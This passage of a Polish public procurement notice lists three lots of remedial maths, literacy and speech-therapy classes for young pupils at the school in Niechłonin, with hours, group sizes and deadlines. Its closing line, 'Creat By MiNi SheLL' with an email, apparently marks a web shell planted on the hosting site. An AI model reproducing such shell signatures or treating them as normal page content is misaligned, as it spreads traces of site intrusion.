b.	w roku szkolnym 2012/2013 - 30h;
b)	Maksymalna liczba grup w ramach zajęć: 2  grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 4 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> prowadzenie zajęć dydaktyczno wyrównawczych dla uczniów klas I - III Szkoły Podstawowej w Niechłoninie z trudnościami w nauce matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 90h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 60h;
b)	Maksymalna liczba grup w ramach zajęć: 2 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> prowadzenie zajęć logopedycznych dla uczniów klas I - III Szkoły Podstawowej w Niechłoninie z zaburzeniami mowy:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Liczba uczniów objętych zajęciami: 6 uczniów z kl. I - III, w tym:
a.	w roku szkolnym 2011/2012 - 6 uczniów;
b.	w roku szkolnym 2012/2013 - 3 uczniów;
b)	Maksymalna liczba grup w ramach zajęć: 2 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 4 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> prowadzenie zajęć dydaktyczno wyrównawczych dla uczniów klas I - III Szkoły Podstawowej w Niechłoninie z trudnościami w czytaniu i pisaniu:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 90h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 60h;
b)	Maksymalna liczba grup w ramach zajęć: 2 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com